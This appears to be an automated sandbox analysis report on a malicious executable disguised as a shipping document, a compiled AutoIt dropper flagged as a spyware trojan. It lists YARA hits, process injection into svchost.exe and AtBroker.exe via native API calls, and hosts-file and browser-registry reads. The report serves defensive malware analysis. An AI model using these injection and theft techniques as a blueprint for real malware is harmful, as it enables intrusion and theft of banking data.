                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A3CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00A3CB26

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.873933070.00000000001B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.436520319.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.369012864.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.874124663.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.873906744.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.873918569.0000000000160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.369018456.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.369105032.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.874128931.0000000004EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: This is a third-party compiled AutoIt script.0_2_009B3B4C
                Source: SHIPPING DOC_20241107.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: SHIPPING DOC_20241107.exe, 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_05c88ec5-e
                Source: SHIPPING DOC_20241107.exe, 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_79527161-b
                Source: SHIPPING DOC_20241107.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b281d072-a
                Source: SHIPPING DOC_20241107.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_378a978d-8
                Source: initial sampleStatic PE information: Filename: SHIPPING DOC_20241107.exe
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C9E3 NtClose,2_2_0042C9E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008907AC NtCreateMutant,LdrInitializeThunk,2_2_008907AC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088F9F0 NtClose,LdrInitializeThunk,2_2_0088F9F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FAE8 NtQueryInformationProcess,LdrInitializeThunk,2_2_0088FAE8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FB68 NtFreeVirtualMemory,LdrInitializeThunk,2_2_0088FB68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FDC0 NtQuerySystemInformation,LdrInitializeThunk,2_2_0088FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008900C4 NtCreateFile,2_2_008900C4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00890048 NtProtectVirtualMemory,2_2_00890048
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00890060 NtQuerySection,2_2_00890060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00890078 NtResumeThread,2_2_00890078
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008901D4 NtSetValueKey,2_2_008901D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0089010C NtOpenDirectoryObject,2_2_0089010C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00890C40 NtGetContextThread,2_2_00890C40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008910D0 NtOpenProcessToken,2_2_008910D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00891148 NtOpenThread,2_2_00891148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088F8CC NtWaitForSingleObject,2_2_0088F8CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088F900 NtReadFile,2_2_0088F900
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088F938 NtWriteFile,2_2_0088F938
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00891930 NtSetContextThread,2_2_00891930
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FAB8 NtQueryValueKey,2_2_0088FAB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FAD0 NtAllocateVirtualMemory,2_2_0088FAD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FA20 NtQueryInformationFile,2_2_0088FA20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FA50 NtEnumerateValueKey,2_2_0088FA50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FBB8 NtQueryInformationToken,2_2_0088FBB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FBE8 NtQueryVirtualMemory,2_2_0088FBE8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FB50 NtCreateKey,2_2_0088FB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FC90 NtUnmapViewOfSection,2_2_0088FC90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FC30 NtOpenProcess,2_2_0088FC30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FC48 NtSetInformationFile,2_2_0088FC48
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FC60 NtMapViewOfSection,2_2_0088FC60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FD8C NtDelayExecution,2_2_0088FD8C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00891D80 NtSuspendThread,2_2_00891D80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FD5C NtEnumerateKey,2_2_0088FD5C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FEA0 NtReadVirtualMemory,2_2_0088FEA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FED0 NtAdjustPrivilegesToken,2_2_0088FED0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FE24 NtWriteVirtualMemory,2_2_0088FE24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FFB4 NtCreateSection,2_2_0088FFB4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FFFC NtCreateProcessEx,2_2_0088FFFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0088FF34 NtQueueApcThread,2_2_0088FF34
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00A1A279
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A08638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00A08638
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A15264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00A15264
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009BE8000_2_009BE800
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009D33070_2_009D3307
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009BFE400_2_009BFE40
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009BE0600_2_009BE060
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009C41400_2_009C4140
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009D23450_2_009D2345
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A304650_2_00A30465
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009E64520_2_009E6452
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009E25AE0_2_009E25AE
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009D277A0_2_009D277A
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A308E20_2_00A308E2
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009C68410_2_009C6841
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009E69C40_2_009E69C4
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A0E9280_2_00A0E928
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009E890F0_2_009E890F
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A189320_2_00A18932
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009C89680_2_009C8968
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009DCCA10_2_009DCCA1
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009E6F360_2_009E6F36
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009C70FE0_2_009C70FE
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009C31900_2_009C3190
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009B12870_2_009B1287
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009DF3590_2_009DF359
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009C56800_2_009C5680
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009D16040_2_009D1604
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009C58C00_2_009C58C0
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009D78130_2_009D7813
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009D1AF80_2_009D1AF8
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009DDAF50_2_009DDAF5
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009E9C350_2_009E9C35
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A37E0D0_2_00A37E0D
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009D1F100_2_009D1F10
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009DBF260_2_009DBF26
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00EA30080_2_00EA3008
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004189832_2_00418983
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F0732_2_0042F073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028102_2_00402810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030F02_2_004030F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010A02_2_004010A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004102432_2_00410243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012102_2_00401210
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022F02_2_004022F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416BD32_2_00416BD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004104632_2_00410463
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C642_2_00402C64
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C702_2_00402C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024C02_2_004024C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024D92_2_004024D9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4E32_2_0040E4E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024B82_2_004024B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0089E0C62_2_0089E0C6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0089E2E92_2_0089E2E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009463BF2_2_009463BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C63DB2_2_008C63DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008A23052_2_008A2305
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008EA37B2_2_008EA37B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0092443E2_2_0092443E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009205E32_2_009205E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BC5F02_2_008BC5F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008E65402_2_008E6540
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008A46802_2_008A4680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008AE6C12_2_008AE6C1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009426222_2_00942622
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008EA6342_2_008EA634
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008AC7BC2_2_008AC7BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008AC85C2_2_008AC85C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C286D2_2_008C286D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0094098E2_2_0094098E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008A29B22_2_008A29B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009349F52_2_009349F5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008B69FE2_2_008B69FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008EC9202_2_008EC920
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0094CBA42_2_0094CBA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00926BCB2_2_00926BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00942C9C2_2_00942C9C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0092AC5E2_2_0092AC5E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008D0D3B2_2_008D0D3B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008ACD5B2_2_008ACD5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008D2E2F2_2_008D2E2F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BEE4C2_2_008BEE4C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0093CFB12_2_0093CFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00912FDC2_2_00912FDC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008B0F3F2_2_008B0F3F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008CD0052_2_008CD005
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008A30402_2_008A3040
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008B905A2_2_008B905A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0091D06D2_2_0091D06D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0092D13F2_2_0092D13F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009412382_2_00941238
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0089F3CF2_2_0089F3CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008A73532_2_008A7353
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008B14892_2_008B1489
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008D54852_2_008D5485
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008DD47D2_2_008DD47D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009435DA2_2_009435DA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008A351F2_2_008A351F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0092579A2_2_0092579A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008D57C32_2_008D57C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0093771D2_2_0093771D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0091F8C42_2_0091F8C4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0093F8EE2_2_0093F8EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_009259552_2_00925955
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0092394B2_2_0092394B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00953A832_2_00953A83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0092DBDA2_2_0092DBDA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0089FBD72_2_0089FBD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008C7B002_2_008C7B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0093FDDD2_2_0093FDDD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0092BF142_2_0092BF14
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008CDF7C2_2_008CDF7C
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_05277D883_2_05277D88
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_0527E4F83_2_0527E4F8
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_05275E083_2_05275E08
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_052969983_2_05296998
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_05277B683_2_05277B68
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_0528026D3_2_0528026D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0089DF5C appears 137 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0090F970 appears 84 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008E3F92 appears 132 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008E373B appears 253 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0089E2A8 appears 60 times
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: String function: 009B7F41 appears 35 times
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: String function: 009D0C63 appears 70 times
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: String function: 009D8A80 appears 42 times
                Source: sqlite3.dll.4.drStatic PE information: Number of sections : 18 > 10
                Source: SHIPPING DOC_20241107.exe, 00000000.00000003.347898978.0000000002A1D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOC_20241107.exe
                Source: SHIPPING DOC_20241107.exe, 00000000.00000003.347838149.0000000002DC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOC_20241107.exe
                Source: SHIPPING DOC_20241107.exe, 00000000.00000002.348381929.0000000000CD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs SHIPPING DOC_20241107.exe
                Source: C:\Windows\SysWOW64\AtBroker.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
                Source: SHIPPING DOC_20241107.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@17/15
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1A0F4 GetLastError,FormatMessageW,0_2_00A1A0F4
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A084F3 AdjustTokenPrivileges,CloseHandle,0_2_00A084F3
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A08AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00A08AA3
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1B3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00A1B3BF
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A2EF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00A2EF21
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A284D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00A284D0
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009B4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_009B4FE9
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeFile created: C:\Users\user\AppData\Local\Temp\starbrightJump to behavior
                Source: SHIPPING DOC_20241107.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\AtBroker.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: AtBroker.exe, 00000004.00000002.874811032.0000000061EA4000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
